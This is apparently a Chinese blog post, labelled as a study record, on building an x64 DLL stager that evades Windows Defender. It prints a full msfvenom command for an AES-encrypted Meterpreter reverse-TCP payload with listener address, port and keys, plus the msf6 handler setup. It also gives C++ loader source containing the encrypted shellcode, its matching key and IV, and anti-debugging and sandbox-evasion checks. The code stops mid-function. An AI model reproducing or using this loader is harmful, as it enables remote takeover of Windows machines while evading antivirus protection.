x64 dll免杀2022-11-20能过defender
仅做学习记录
项目地址:https://github.com/phackt/stager.dll
msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 EXIT_FUNC=PROCESS LHOST=192.168.3.4 LPORT=4433 SessionRetryTotal=60 RC4PASSWORD=KliikBjsjwl221 --encrypt aes256 --encrypt-iv A1a0eCXCCB0YzS4j --encrypt-key 1ASMkFxcyhwXehNZw048ca11h1BCzyyR -f c
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp_rc4
payload => windows/x64/meterpreter/reverse_tcp_rc4
msf6 exploit(multi/handler) > set lhost 192.168.3.4
lhost => 192.168.3.4
msf6 exploit(multi/handler) > set lport 4433
lport => 4433
msf6 exploit(multi/handler) > set rc4password KliikBjsjwl221
rc4password => KliikBjsjwl221
源文件 stager.cpp
#define CBC 1
#include "aes.h"
#include <Windows.h>
#include <Wininet.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <iostream>
#pragma comment(lib, "User32.lib")
#pragma comment(lib, "Wininet.lib")
using namespace std;
#define PAYLOADLENGTH 650
#define IV "A1a0eCXCCB0YzS4j"
#define KEY "1ASMkFxcyhwXehNZw048ca11h1BCzyyR"
#define CLASSNAME "111111"
#define WINDOWTITLE "11111"
// Ciphertext of the msfvenom output shown at the top of this page, encrypted
// with AES-256 (CBC mode, per the CBC define above); the --encrypt-iv and
// --encrypt-key values in that command match the IV and KEY macros. Because
// the array is initialised from a string literal it also carries a
// terminating NUL byte after the ciphertext.
unsigned char buf[] =
"\x1e\xdf\x46\x01\x61\xcf\x72\x3b\xba\xf3\xa6\x72\x46\x47\x82"
"\xdd\x84\x28\x1f\x71\xa7\xfc\x9e\xc6\x42\x04\xc6\x86\xca\xfa"
"\x5e\xad\xca\x7a\x3f\xd1\xee\xdb\xa3\x21\xfb\x75\x2d\x65\x66"
"\x66\x72\x28\x5d\x0d\x3b\xe7\xf6\x3e\xb7\xb6\x20\x24\x72\xd6"
"\x71\x29\xd9\x01\x07\x94\x64\x26\x2a\xff\x39\xa2\xa1\x5b\x81"
"\x35\xdb\x01\x6f\x50\x9d\xa5\x20\x29\x0a\x53\xa3\xe4\xdb\xda"
"\x25\x7c\x71\xa0\xd7\xd9\x96\x08\xa1\x5f\x20\x30\xd8\xc6\x8a"
"\xbe\xc6\xdf\x49\x0d\x94\x16\xb7\x78\x97\x5b\xee\x0f\x89\x00"
"\x2c\x31\x7a\x60\x75\x14\x90\xba\x9a\x1e\xce\x13\x8e\x9e\x93"
"\xf4\x45\x09\x2d\x7e\x88\x3d\xda\x7e\xc1\xc6\xcf\xed\x08\x5d"
"\xb7\x18\xfe\xbf\xa7\x60\xae\xc8\x12\x58\xc1\x25\x9f\x95\x04"
"\x1a\xb5\xb8\xc3\xc5\xa1\x9e\x20\x94\x51\x99\x3f\xeb\x9f\x00"
"\x37\x7c\x17\xa1\xd0\xdd\xbf\xfe\xc9\xbd\x12\x45\x4d\x5e\xe7"
"\xed\x2e\xb3\xe1\x20\x46\xcd\x59\x5e\xcc\xd3\x85\x97\x79\x1d"
"\x22\x75\x6e\x81\x9b\xa8\xc1\xab\xe6\x29\x7d\xf5\x92\x36\x69"
"\x78\x10\x99\x66\xdf\xa8\xd6\x79\x70\xa3\xe9\xbc\x98\xb8\x4e"
"\x60\x4b\xc2\xc7\x36\xbb\x6c\xa6\x79\xff\x5c\x91\x6b\xe8\xc5"
"\xb6\x88\x06\xf8\x4d\x0a\x2d\x9c\x52\xe7\xc0\x98\x0f\x5d\x6e"
"\xf1\x41\x98\x81\xc9\xa3\x98\x19\xd9\x1f\x99\xc8\x8d\x21\xe1"
"\xe0\xcd\x31\x92\x76\xfa\x1f\x3f\xc4\xd2\xef\x13\xbb\x0e\xbe"
"\x8e\x53\x8e\x1a\x7a\xbb\xf8\xd5\xef\xdf\x11\x42\xe1\xde\x4c"
"\xc6\x39\x62\x62\x4c\xf0\xb7\xe6\x40\x1b\x3d\x21\xe4\xb3\xe8"
"\xfb\x87\xe1\xae\xc5\x18\x8e\x1c\x34\x4d\x67\x3d\x04\x24\x82"
"\xa5\xeb\xbf\x78\xbf\x6b\xe7\x10\xda\x83\x54\x90\xe8\x6f\x38"
"\xa1\x13\xbb\xe2\x4a\x99\x0f\x3d\x78\xf1\xd9\x31\xa9\x21\xff"
"\x4d\xae\x07\xaa\x2f\x0b\x8c\xd8\x16\x55\xa5\xcc\xf3\x20\xc6"
"\x99\x6b\x3c\x67\x93\xc1\x10\xeb\x47\xdb\xca\xda\x5d\x9d\xd0"
"\xdd\x6e\xb4\xd9\x2e\x8d\x0f\x82\x07\xb8\xf5\xdd\x72\x83\x37"
"\xbc\x92\x00\x3b\xb8\x0c\xbb\xb7\x26\x07\x95\xc5\xce\xbb\x90"
"\x47\xee\x16\x69\xca\x52\xe8\x38\x04\x58\xb2\x51\x93\xc7\x26"
"\x07\xdc\x83\xba\xee\x47\x77\x95\x4b\x3d\xba\x17\x1a\xcf\x66"
"\x74\x38\x21\x69\x27\x64\xdd\x80\xca\xd5\xa3\xfd\x9a\x00\x25"
"\xdd\x8c\x1e\x98\x49\x0f\xf9\x1b\xbc\x5b\x82\xaf\x06\x67\xb6"
"\xea\xf3\x3c\xcc\xce\x0f\xf2\xbc\x3e\xa3\xf0\x77\x9f\xce\x7a"
"\xf3\x56\x88\x1a\x49\x86\x4c\x32\x8d\x75\xec\x3d\x86\x8e\x15"
"\xed\xb7\xa9\x4c\x08\xf7\x51\x17\x8a\x81\xec\xeb\x8b\x6a\xbe"
"\x78\xe7\xba\x86\x4c\x68\x1a\x50\xf4\x6c\xf8\x3b\x35\x9e\x1b"
"\x16\x9d\x7e\x68\x74\xf9\x05\x39\x3e\xa4\x07\x5c\x94\x68\x6a"
"\xe5\x1e\x7a\x11\x60\xd8\x4e\xc8\xa0\xd8\x12\xf0\x48\x39\xbb"
"\x4b\xb7\xf9\xd4\x07\x56\x76\x0f\x2a\xc5\x06\xa8\x94\xfa\x1b"
"\x9f\xbb\x5a\xe9\xbb\x3f\xc1\xfe\x7d\x40\xdf\x75\x11\x80\xd9"
"\x37\x83\x03\x64\x00\xc2\x82\x9e\x18\xfe\xe6\x56\xaa\x23\xd4"
"\x5a\x54\x92\x0c\xd1\x24\x78\x8f\x8d\x8f\x20\x3a\xd2\x5b\xfb"
"\x0e\x02\xc5\x37\x80\xdf\x78\x4c\x5c\x56\x04";
// Size of the array as laid out in memory (sizeof(buf), including the NUL
// terminator mentioned above).
const int ENCRYPTEDBUFFERLENGTH = sizeof(buf);
namespace Aes256MsfPayload {
class Utils {
public:
// Reports whether the Win32 IsDebuggerPresent() call says a user-mode
// debugger is attached to the calling process. Returns 1 when it does and
// 0 otherwise; the return type is char rather than bool.
// Detection note: this API check is one of the most common anti-analysis
// indicators seen in loaders and is trivially visible in the import table.
static char IsDbgPresent() {
    return IsDebuggerPresent() ? 1 : 0;
}
static bool IsSandboxPresent() {
// Non-uniform memory access (NUMA) is a computer memory design used in multiprocessing,
// where the memory access time depends on the memory location relative to the processor.
// https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf
return VirtualAlloc